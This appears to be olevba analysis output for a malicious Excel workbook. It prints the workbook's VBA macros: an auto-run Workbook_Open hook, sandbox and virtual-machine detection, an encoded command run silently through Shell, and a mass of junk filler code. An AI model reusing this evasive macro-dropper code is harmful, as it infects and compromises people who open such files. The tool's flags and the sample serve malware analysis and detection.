Malicious Excel macro

olevba 0.25 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MASIHB- Rem_8392TN.xml

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: Rem_8392TN.xml
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ÝòàÊíèãà.cls
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Workbook_Open()
jhVKdsfjsd
Dim siNQQVbL As Integer
For siNQQVbL = 0 To 0
If siNQQVbL = 5 Then End
Next siNQQVbL
Dim gJLryR As Integer
For gJLryR = 0 To 0
If gJLryR = 5 Then End
Next gJLryR
Dim wVKHBTQ As Integer
For wVKHBTQ = 0 To 0
If wVKHBTQ = 5 Then End
Next wVKHBTQ
End Sub


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+---------------+----------------------------------------+
| Type     | Keyword       | Description                            |
+----------+---------------+----------------------------------------+
| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
+----------+---------------+----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Ëèñò1.cls
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Ëèñò2.cls
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Ëèñò3.cls
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class1.cls
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Private Function nxNZiOiHENlXPUXVbjKuvaMDRZpscgBqooOqJ()

Dim vowYxIwMEb As Integer
vowYxIwMEb = 8:
Do While vowYxIwMEb < 30
   DoEvents: vowYxIwMEb = vowYxIwMEb + 1
Loop

If "dJaAtNalSZ" = "QyrtgazWfE" Then End

If "AmpntVcNOs" = "xVjrBLurmC" Then End

End Function

Private Function wwWyRnRgNmuWxtGnKCTUesVCHrYSLyKjXOwpr()

If "nMxiuRPuDk" = "vPUfDSsJTW" Then End

If "ukPPoRcGjy" = "FeNoQMyGCu" Then End

GoTo mwLNUsKqdd
mwLNUsKqdd:

End Function

Private Sub HLrfpFRANaGDMdPHMPNTbJmnSEbQRhkUYsigg()

GoTo rAnNVQrNAd
rAnNVQrNAd:

GoTo tnYTovaSSl
tnYTovaSSl:

Dim ZdjYhXjSys As Long
ZdjYhXjSys = "2076":

End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Class2.cls
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Function jXOwprFSxuEcnYkHFkTBlFKvTIJyJMQkaFfeH()

GoTo XdDLNoKwea
XdDLNoKwea:

Dim jLVjlsRIPb As Integer
jLVjlsRIPb = 7:
Do While jLVjlsRIPb < 16
   DoEvents: jLVjlsRIPb = jLVjlsRIPb + 1
Loop

Dim AOYnziviOL As Integer
AOYnziviOL = 0:
Do While AOYnziviOL < 11
   DoEvents: AOYnziviOL = AOYnziviOL + 1
Loop

GoTo PuxvbKRVva
PuxvbKRVva:

If "zpTcgBRoPO" = "qJmQylltop" Then End

Dim mCBSMwrNUZ As Integer
mCBSMwrNUZ = 8:
Do While mCBSMwrNUZ < 26
   DoEvents: mCBSMwrNUZ = mCBSMwrNUZ + 1
Loop

GoTo KxCIWGvhqw
KxCIWGvhqw:

GoTo mvUfxcfdjS
mvUfxcfdjS:

Dim DEiuLQYBko As Integer
DEiuLQYBko = 4:
Do While DEiuLQYBko < 12
   DoEvents: DEiuLQYBko = DEiuLQYBko + 1
Loop

End Function

Public Sub ooOqJfJYlemOplxmCtrMWrNtyQQKDqCIPGohj()

GoTo uEcnyLOMrt
uEcnyLOMrt:

Dim lMRWTIQZJT As Long
lMRWTIQZJT = "4654":

Dim FfeHzWnvVD As Long
FfeHzWnvVD = "146":

If "CoWskbcNBd" = "kpAgatHsrf" Then End

If "FYANaGDMkW" = "HTPNTbJtnS" Then End

Dim QRhrUYTJnn As Long
QRhrUYTJnn = "8655":

If "EIXdDLNoKw" = "easjLVjlsR" Then End

If "PbbptAOYnz" = "iviOLUMXPu" Then End

GoTo bKRVvamjyz
bKRVvamjyz:

End Sub

Private Sub hkUYsiggGIBEIQdDLGhdpetsjEOJelqIIbCPt()

Dim vhqwqpmvUf As Integer
vhqwqpmvUf = 9:
Do While vhqwqpmvUf < 14
   DoEvents: vhqwqpmvUf = vhqwqpmvUf + 1
Loop

GoTo jSsDEiuLQY
jSsDEiuLQY:

Dim ojZXXwZrOr As Long
ojZXXwZrOr = "4269":

GoTo uwYUgVKCAu
uwYUgVKCAu:

Dim AVChyySlZK As Integer
AVChyySlZK = 6:
Do While AVChyySlZK < 28
   DoEvents: AVChyySlZK = AVChyySlZK + 1
Loop

Dim XQSFZxuEcn As Integer
XQSFZxuEcn = 10:
Do While XQSFZxuEcn < 30
   DoEvents: XQSFZxuEcn = XQSFZxuEcn + 1
Loop

Dim MrtalMRWTI As Integer
MrtalMRWTI = 7:
Do While MrtalMRWTI < 3
   DoEvents: MrtalMRWTI = MrtalMRWTI + 1
Loop

GoTo TQkaFfeHzW
TQkaFfeHzW:

Dim vVDFGCoWsk As Long
vVDFGCoWsk = "5896":

End Sub

Private Sub UesVCHrYSLyKjXOwprFSxuEcnYkHFkTBlFKvT()

Dim UYTJnnmPBE As Integer
UYTJnnmPBE = 3:
Do While UYTJnnmPBE < 2
   DoEvents: UYTJnnmPBE = UYTJnnmPBE + 1
Loop

Dim DLNoKweasj As Integer
DLNoKweasj = 10:
Do While DLNoKweasj < 6
   DoEvents: DLNoKweasj = DLNoKweasj + 1
Loop

GoTo sRIPbbptAO
sRIPbbptAO:

Dim nziviOLUMX As Integer
nziviOLUMX = 8:
Do While nziviOLUMX < 27
   DoEvents: nziviOLUMX = nziviOLUMX + 1
Loop

GoTo vbKRVvamjy
vbKRVvamjy:

Dim pTcgBRoPOq As Integer
pTcgBRoPOq = 8:
Do While pTcgBRoPOq < 15
   DoEvents: pTcgBRoPOq = pTcgBRoPOq + 1
Loop

Dim ylltoplYmC As Integer
ylltoplYmC = 6:
Do While ylltoplYmC < 11
   DoEvents: ylltoplYmC = ylltoplYmC + 1
Loop

GoTo wrNUZqqKKx
wrNUZqqKKx:

GoTo IWGvhqwqpm
IWGvhqwqpm:

End Sub

Private Sub NlXPUXVbjKuvaMDRZpscgBqooOqJfJYlemOpl()

GoTo CAueAVChyy
CAueAVChyy:

GoTo KqxOXQSFZx
KqxOXQSFZx:

Dim EcnyLOMrta As Long
EcnyLOMrta = "272":

Dim RWTIQZJTQk As Integer
RWTIQZJTQk = 5:
Do While RWTIQZJTQk < 19
   DoEvents: RWTIQZJTQk = RWTIQZJTQk + 1
Loop

Dim zWnvVDFGCo As Long
zWnvVDFGCo = "5900":

Dim kbcNBdkpAg As Long
kbcNBdkpAg = "1401":

If "HsrfwFYANa" = "GDMkWHTPNT" Then End

If "JtnSEbQRhr" = "UYTJnnmPBE" Then End

GoTo sjLVjlsRIP
sjLVjlsRIP:

End Sub

Private Function TTHLrfpFRANaGDMdPHMPNTbJmnSEbQRhkUYsi()

Dim lYmCBSMwrN As Long
lYmCBSMwrN = "4520":

Dim qqKKxCIWGv As Long
qqKKxCIWGv = "2028":

If "wqpmvUfxcf" = "djSsDEiuLQ" Then End

Dim BkojZXXwZr As Long
BkojZXXwZr = "3274":

Dim muwYUgVKCA As Integer
muwYUgVKCA = 2:
Do While muwYUgVKCA < 9
   DoEvents: muwYUgVKCA = muwYUgVKCA + 1
Loop

Dim VChyySlZKq As Integer
VChyySlZKq = 6:
Do While VChyySlZKq < 16
   DoEvents: VChyySlZKq = VChyySlZKq + 1
Loop

GoTo QSFZxuEcny
QSFZxuEcny:

If "rtalMRWTIQ" = "ZJTQkaFfeH" Then End

Dim nvVDFGCoWs As Long
nvVDFGCoWs = "8149":

End Function

Private Function TUesVCHrYSLyKjXOwprFSxuEcnYkHFkTBlFKv()

If "hrUYTJnnmP" = "BEIXdDLNoK" Then End

GoTo IPbbptAOYn
IPbbptAOYn:

Dim iOLUMXPuxv As Long
iOLUMXPuxv = "4273":

Dim RVvamjyzpT As Integer
RVvamjyzpT = 8:
Do While RVvamjyzpT < 9
   DoEvents: RVvamjyzpT = RVvamjyzpT + 1
Loop

If "RoPOqJmQyl" = "ltoplYmCBS" Then End

If "rNUZqqKKxC" = "IWGvhqwqpm" Then End

If "UfxcfdjSsD" = "EiuLQYBkoj" Then End

If "XXwZrOrgUm" = "uwYUgVKCAu" Then End

Dim qxOXQSFZxu As Integer
qxOXQSFZxu = 8:
Do While qxOXQSFZxu < 8
   DoEvents: qxOXQSFZxu = qxOXQSFZxu + 1
Loop

End Function

Private Sub fQcfdjLSDEinLzhqBkhcSwwWyRnRgNmuWxtGn()

GoTo cNBdkpAgat
cNBdkpAgat:

GoTo srfwFYANaG
srfwFYANaG:

Dim MkWHTPNTbJ As Long
MkWHTPNTbJ = "1275":

Dim SEbQRhrUYT As Long
SEbQRhrUYT = "5649":

Dim mPBEIXdDLN As Integer
mPBEIXdDLN = 1:
Do While mPBEIXdDLN < 9
   DoEvents: mPBEIXdDLN = mPBEIXdDLN + 1
Loop

If "easjLVjlsR" = "IPbbptAOYn" Then End

Dim JmQylltopl As Long
JmQylltopl = "895":

Dim BSMwrNUZqq As Long
BSMwrNUZqq = "9270":

If "xCIWGvhqwq" = "pmvUfxcfdj" Then End

End Sub

Private Sub jKuvaMDRZpscgBqooOqJfJYlemOplxmCtrMWr()

GoTo yySlZKqxOX
yySlZKqxOX:

Dim SFZxuEcnyL As Integer
SFZxuEcnyL = 2:
Do While SFZxuEcnyL < 15
   DoEvents: SFZxuEcnyL = SFZxuEcnyL + 1
Loop

GoTo talMRWTIQZ
talMRWTIQZ:

Dim atHsrfwFYA As Integer
atHsrfwFYA = 3:
Do While atHsrfwFYA < 9
   DoEvents: atHsrfwFYA = atHsrfwFYA + 1
Loop

GoTo tnSEbQRhrU
tnSEbQRhrU:

Dim JnnmPBEIXd As Long
JnnmPBEIXd = "7522":

Dim NoKweasjLV As Long
NoKweasjLV = "4528":

Dim YnziviOLUM As Integer
YnziviOLUM = 10:
Do While YnziviOLUM < 1
   DoEvents: YnziviOLUM = YnziviOLUM + 1
Loop

Dim xvbKRVvamj As Integer
xvbKRVvamj = 6:
Do While xvbKRVvamj < 3
   DoEvents: xvbKRVvamj = xvbKRVvamj + 1
Loop

End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Class3.cls
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Private Function bJmnSEbQRhkUYsiggGIBEIQdDLGhdpetsjEOJ()

Dim qqKKxCIWGv As Long
qqKKxCIWGv = "2028":

If "wqpmvUfxcf" = "djSsDEiuLQ" Then End

Dim BkojZXXwZr As Long
BkojZXXwZr = "3274":

Dim muwYUgVKCA As Integer
muwYUgVKCA = 2:
Do While muwYUgVKCA < 9
   DoEvents: muwYUgVKCA = muwYUgVKCA + 1
Loop

End Function

Public Sub rNtyQQKDqCIPGohjwqPMVtfQcfdjLSDEinLzh()

GoTo QkaFfeHzWn
QkaFfeHzWn:

Dim VDFGCoWskb As Long
VDFGCoWskb = "8643":

If "BdkpAgatHs" = "rfwFYANaGD" Then End

Dim kWHTPNTbJt As Integer
kWHTPNTbJt = 1:
Do While kWHTPNTbJt < 22
   DoEvents: kWHTPNTbJt = kWHTPNTbJt + 1
Loop

End Sub

Private Function vTIJyJMQkaFfeHsvZoVuDFGCovSkbcmBdKiAg()

Dim tAOYnziviO As Integer
tAOYnziviO = 6:
Do While tAOYnziviO < 21
   DoEvents: tAOYnziviO = tAOYnziviO + 1
Loop

Dim XPuxvbKRVv As Long
XPuxvbKRVv = "3023":

If "jyzpTcgBRo" = "POqJmQyllt" Then End

GoTo plYmCBSMwr
plYmCBSMwr:

End Function

Private Sub elqIIbCPtznxNZiOiHENlXPUXVbjKuvaMDRZp()

Dim jZXXwZrOrg As Integer
jZXXwZrOrg = 4:
Do While jZXXwZrOrg < 26
   DoEvents: jZXXwZrOrg = jZXXwZrOrg + 1
Loop

Dim wYUgVKCAue As Integer
wYUgVKCAue = 3:
Do While wYUgVKCAue < 27
   DoEvents: wYUgVKCAue = wYUgVKCAue + 1
Loop

If "hyySlZKqxO" = "XQSFZxuEcn" Then End

Dim LOMrtalMRW As Integer
LOMrtalMRW = 4:
Do While LOMrtalMRW < 20
   DoEvents: LOMrtalMRW = LOMrtalMRW + 1
Loop

End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Class4.cls
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Private Sub uEcnYkHFkTBlFKvTIJyJMQkaFfeHsvZoVuDFG()

Dim CuLmwLNUsK As Integer
CuLmwLNUsK = 2:
Do While CuLmwLNUsK < 19
   DoEvents: CuLmwLNUsK = CuLmwLNUsK + 1
Loop

End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Class5.cls
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Function xmCtrMWrNtyQQKDqCIPGohjwqPMVtfQcfdjLS()

Dim xVjrBLurmC As Integer
xVjrBLurmC = 9:
Do While xVjrBLurmC < 24
   DoEvents: xVjrBLurmC = xVjrBLurmC + 1
Loop

End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO dfsdf.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/dfsdf'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


 Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
 Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long
 Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long
 Const HKEY_LOCAL_MACHINE = &H80000002

 Public Function IsVirtualPCPresent() As Long
 Dim lhKey As Long
 Dim sBuffer As String
 Dim lLen As Long
 If RegOpenKeyEx(&H80000002, "SYSTEM\ControlSet001\Services\Disk\Enum", _
 0, &H20019, lhKey) = 0 Then
 sBuffer = Space$(255): lLen = 255
 If RegQueryValueEx(lhKey, "0", 0, 1, ByVal sBuffer, lLen) = 0 Then
 sBuffer = UCase(Left$(sBuffer, lLen - 1))
 Select Case True
 Case sBuffer Like "*VIRTUAL*": IsVirtualPCPresent = 1
 Case sBuffer Like "*VMWARE*": IsVirtualPCPresent = 2
 Case sBuffer Like "*VBOX*": IsVirtualPCPresent = 3
 If IsVirtualPCPresent = 1 Or 2 Or 3 Then End
 End Select
 End If
 Call RegCloseKey(lhKey)
 End If
 End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | Lib            | May run code from a DLL                 |
| Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
|            |                | be used to obfuscate strings (option    |
|            |                | --decode to see all)                    |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO load.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/load'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 Sub jhVKdsfjsd()
    If IsSandBoxiePresent(1) = True Then End
    If IsAnubisPresent(1) = True Then End
    If IsVirtualPCPresent = True Then End
oPOJidsf = MkSrpQP("ÕÐºƒw tºÒÍÈº¨¼×ÏÂ‘Í¹’‹¤È¿‚£ÔÍ»Æ¼u§ëÖÊÈµƒ¢××„º·—ÞÌ»Ñ¼~‚¶ÒÍÑ´ÄµÖ©¿Ï}{Ú×ÊÓ‚„ƒ«–„”…‚£•‰‘{‹ƒÓÖºÙÀ„ºÙËÉ‘¸½Ä™}ˆœš¡Âˆ²Ç»»ÇÖ©œ©¾ƒ·ÓÅ}Œƒu¹êÓ·Ñ¬uyÆ¨£³m±¸åÉÉÇŽ›šè‘¹ÄªuyÆ¨£³m±¸åÉÉÇŽ›šè‘»Ûtå×·Õ¼uyÆ¨£³m±¸åÉÉÇŽ›šè‘»Û", "rcVcHUTj")
Dim wfSoeUjt As Integer
For wfSoeUjt = 0 To 0
If wfSoeUjt = 5 Then End
Next wfSoeUjt
Dim tNhbQ As Integer
For tNhbQ = 0 To 0
If tNhbQ = 5 Then End
Next tNhbQ
Shell oPOJidsf, 0
Dim stahzHxdYZQ As Integer
For stahzHxdYZQ = 0 To 0
If stahzHxdYZQ = 5 Then End
Next stahzHxdYZQ
    End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | Shell          | May run an executable file or a system  |
|            |                | command                                 |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub gbwEJaatNBMSZQyrtgBZWfEpampntVcNOsxVj()

Dim VpfKKjMeBe As Long
VpfKKjMeBe = "4141":

If "ojLHtBXPGh" = "rGIPuFlFyM" Then End

Dim kBKDFSFkhR As Long
kBKDFSFkhR = "6144":

Dim lYUSYgnysX As Integer
lYUSYgnysX = 9:
Do While lYUSYgnysX < 19
   DoEvents: lYUSYgnysX = lYUSYgnysX + 1
Loop

If "WMWZDxnSsr" = "UfJmCiIQST" Then End

GoTo bJfxopAOqx
bJfxopAOqx:

End Sub

Public Sub sKqddRVCpzPbKXkQNWnyqWZXDlTwxcOlabrue()

If "ttTvORVDqQ" = "YTuqDrgfwR" Then End

If "wryEVVoocg" = "NBLamvbvUR" Then End

Dim ZKChkioXxI As Long
ZKChkioXxI = "7641":

If "zQemcGptOE" = "bCBdWsWlyr" Then End

Dim bcyLlHFZje As Long
bcyLlHFZje = "1896":

Dim MddXQdPVcT As Long
MddXQdPVcT = "6018":

End Sub

Public Function rtgBZWfEpampntVcNOsxVjrBLurmcHHgJbxbq()

Dim jLHtBXPGhr As Long
jLHtBXPGhr = "2393":

Dim PuFlFyMXwk As Long
PuFlFyMXwk = "6265":

GoTo DFSFkhRpal
DFSFkhRpal:

If "SYgnysXJGV" = "WMWZDxnSsr" Then End

Dim JmCiIQSTPb As Long
JmCiIQSTPb = "5772":

If "pAOqxvNtgg" = "UyescSENAn" Then End

End Function

Private Function QNWnyqWZXDlTwxcOlabrueiDsqqpSLOranNVQ()

Dim rgfwRBwryE As Integer
rgfwRBwryE = 7:
Do While rgfwRBwryE < 27
   DoEvents: rgfwRBwryE = rgfwRBwryE + 1
Loop

GoTo cgNBLamvbv
cgNBLamvbv:

Dim RaZKChkioX As Long
RaZKChkioX = "7273":

If "inzQemcGpt" = "OEbCBdWsWl" Then End

GoTo rzbcyLlHFZ
rzbcyLlHFZ:

Dim eAHMddXQdP As Integer
eAHMddXQdP = 5:
Do While eAHMddXQdP < 29
   DoEvents: eAHMddXQdP = eAHMddXQdP + 1
Loop

End Function

Public Function QyrtgBZWfEpampntVcNOsxVjrBLurmcHHgJbx()

Dim XwkBKDFSFk As Integer
XwkBKDFSFk = 4:
Do While XwkBKDFSFk < 6
   DoEvents: XwkBKDFSFk = XwkBKDFSFk + 1
Loop

Dim alYUSYgnys As Long
alYUSYgnys = "888":

If "VWMWZDxnSs" = "rUfJmCiIQS" Then End

GoTo vNtggUyesc
vNtggUyesc:

Dim ENAnTQZqCU As Long
ENAnTQZqCU = "2268":

GoTo AGoWAaFRoD
AGoWAaFRoD:

End Function

Public Function brueiDsqqpSLOranNVQrnAoEDtOYTovBSSllZ()

GoTo LamvbvURaZ
LamvbvURaZ:

Dim ChkioXxIin As Integer
ChkioXxIin = 1:
Do While ChkioXxIin < 21
   DoEvents: ChkioXxIin = ChkioXxIin + 1
Loop

GoTo mcGptOEbCB
mcGptOEbCB:

Dim WsWlyrzbcy As Integer
WsWlyrzbcy = 1:
Do While WsWlyrzbcy < 22
   DoEvents: WsWlyrzbcy = WsWlyrzbcy + 1
Loop

Dim FZjeAHMddX As Long
FZjeAHMddX = "8268":

If "PVcTbuwjdc" = "ziHsdpsqwY" Then End

End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Function fGTxESCRdmSmLIRpbTYbZfnOyzeQHVdtwgkFV()

Dim HLncVDFgCo As Long
HLncVDFgCo = "5898":

Dim kicNIdkpHH As Long
kicNIdkpHH = "1398":

If "HsyGwFYANh" = "GDMkWHTWUA" Then End

GoTo UuZEbqYhrB
UuZEbqYhrB:

Dim TJnnNpIeIX As Long
TJnnNpIeIX = "5651":

Dim lNokXeaTjL As Integer
lNokXeaTjL = 1:
Do While lNokXeaTjL < 14
   DoEvents: lNokXeaTjL = lNokXeaTjL + 1
Loop

Dim YiPiCpaAOF As Long
YiPiCpaAOF = "9154":

If "iviOLuTEPb" = "xvbKrCWamK" Then End

End Function

Private Sub MNdNQUoeJjiLwAdsZyHJKGsaWofgqFhOmEkXX()

If "wGvhqdRwtc" = "UfxcfEjSzd" Then End

Dim JuSghYBkPj As Integer
JuSghYBkPj = 8:
Do While JuSghYBkPj < 6
   DoEvents: JuSghYBkPj = JuSghYBkPj + 1
Loop

If "wZrVygUtbw" = "YUgVKJAueA" Then End

GoTo ChZySsGKqe
ChZySsGKqe:

Dim QZFZxuEcOf As Integer
QZFZxuEcOf = 5:
Do While QZFZxuEcOf < 9
   DoEvents: QZFZxuEcOf = QZFZxuEcOf + 1
Loop

If "aBlmRDtIQG" = "jTXrhFfeHL" Then End

Dim PcVDFgCoDs As Long
PcVDFgCoDs = "8147":

Dim cNIdkpHHat As Long
cNIdkpHHat = "3146":

End Sub

Private Function GMTKslnBuTQZxjUgjhnPWHImrPEluFolgWBBa()

GoTo IXdDlNokXe
IXdDlNokXe:

GoTo TjLVjlsYiP
TjLVjlsYiP:

GoTo CpaAOFngiv
CpaAOFngiv:

GoTo OLuTEPbxvb
OLuTEPbxvb:

If "rCWamKyzpA" = "cgbRvWVxJm" Then End

GoTo fMltvwsFmJ
fMltvwsFmJ:

Dim TdrUBZqxKK As Long
TdrUBZqxKK = "5153":

Dim IwGvhqdRwt As Integer
IwGvhqdRwt = 1:
Do While IwGvhqdRwt < 26
   DoEvents: IwGvhqdRwt = IwGvhqdRwt + 1
Loop

End Function

Private Sub TLQTRXfNqrWIfUVloYcwmkkKMFIMUhHPKlhti()

GoTo eAvChZySsG
eAvChZySsG:

Dim qeoEQZFZxu As Long
qeoEQZFZxu = "8022":

GoTo OfLOMSaBlm
OfLOMSaBlm:

Dim DtIQGjTXrh As Long
DtIQGjTXrh = "6529":

GoTo eHLncVDFgC
eHLncVDFgC:

GoTo DskicNIdkp
DskicNIdkp:

Dim HatHsyGwFY As Integer
HatHsyGwFY = 1:
Do While HatHsyGwFY < 9
   DoEvents: HatHsyGwFY = HatHsyGwFY + 1
Loop

If "GDMkWHTWUA" = "bJUuZEbqYh" Then End

End Sub

Private Function FolgWBBaDVrVkRqyaCxKrOGXYiwZGLvcWPDOn()

Dim giviOLuTEP As Integer
giviOLuTEP = 3:
Do While giviOLuTEP < 6
   DoEvents: giviOLuTEP = giviOLuTEP + 1
Loop

Dim bKrCWamKyz As Long
bKrCWamKyz = "6521":

If "cgbRvWVxJm" = "QfMltvwsFm" Then End

Dim BSTdrUBZqx As Long
BSTdrUBZqx = "3405":

If "xCIwGvhqdR" = "wtcUfxcfEj" Then End

Dim zdEJuSghYB As Integer
zdEJuSghYB = 9:
Do While zdEJuSghYB < 24
   DoEvents: zdEJuSghYB = zdEJuSghYB + 1
Loop

If "zXXwZrVygU" = "tbwYUgVKJA" Then End

GoTo AvChZySsGK
AvChZySsGK:

End Function

Public Function ESCRdmSmLIRpbTYbZfnOyzeQHVdtwgkFVssSu()

If "PcVDFgCoDs" = "kicNIdkpHH" Then End

If "HsyGwFYANh" = "GDMkWHTWUA" Then End

GoTo yTJnnNpIeI
yTJnnNpIeI:

If "dDlNokXeaT" = "jLVjlsYiPi" Then End

If "aAOFngiviO" = "LuTEPbxvbK" Then End

If "CWamKyzpAc" = "gbRvWVxJmQ" Then End

If "MltvwsFmJB" = "STdrUBZqxK" Then End

Dim SzdEJuSghY As Integer
SzdEJuSghY = 2:
Do While SzdEJuSghY < 14
   DoEvents: SzdEJuSghY = SzdEJuSghY + 1
Loop

End Function

Private Sub cwmkkKMFIMUhHPKlhtixwnISNipuMMfGTxESC()

GoTo ZxuEcOfLOM
ZxuEcOfLOM:

If "aBlmRDtIQG" = "jTXrhFfeHL" Then End

Dim atHsyGwFYA As Long
atHsyGwFYA = "2770":

GoTo rByTJnnNpI
rByTJnnNpI:

Dim aTjLVjlsYi As Long
aTjLVjlsYi = "6019":

Dim iOLuTEPbxv As Integer
iOLuTEPbxv = 4:
Do While iOLuTEPbxv < 24
   DoEvents: iOLuTEPbxv = iOLuTEPbxv + 1
Loop

GoTo KKxCIwGvhq
KKxCIwGvhq:

Dim RwtcUfxcfE As Long
RwtcUfxcfE = "5274":

End Sub

Private Function fNqrWIfUVloYcwmkkKMFIMUhHPKlhtixwnISN()

Dim ZySsGKqeoE As Long
ZySsGKqeoE = "3029":

GoTo SaBlmRDtIQ
SaBlmRDtIQ:

Dim ncVDFgCoDs As Integer
ncVDFgCoDs = 8:
Do While ncVDFgCoDs < 13
   DoEvents: ncVDFgCoDs = ncVDFgCoDs + 1
Loop

Dim IdkpHHatHs As Integer
IdkpHHatHs = 7:
Do While IdkpHHatHs < 13
   DoEvents: IdkpHHatHs = IdkpHHatHs + 1
Loop

Dim FYANhGDMkW As Integer
FYANhGDMkW = 1:
Do While FYANhGDMkW < 15
   DoEvents: FYANhGDMkW = FYANhGDMkW + 1
Loop

Dim UAbJUuZEbq As Integer
UAbJUuZEbq = 8:
Do While UAbJUuZEbq < 19
   DoEvents: UAbJUuZEbq = UAbJUuZEbq + 1
Loop

GoTo ByTJnnNpIe
ByTJnnNpIe:

GoTo XdDlNokXea
XdDlNokXea:

End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Module3.bas
in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Function oDfMRCicVJUthYHACPChenmxiuRPudkVPUGdS()

Dim ZDxnSsrUfJ As Integer
ZDxnSsrUfJ = 2:
Do While ZDxnSsrUfJ < 3
   DoEvents: ZDxnSsrUfJ = ZDxnSsrUfJ + 1
Loop

If "IQSTPbJfxo" = "pAOqxvNtgg" Then End

GoTo yescSENAnT
yescSENAnT:

Dim ZqCUZCAGoW As Long
ZqCUZCAGoW = "1147":

End Function

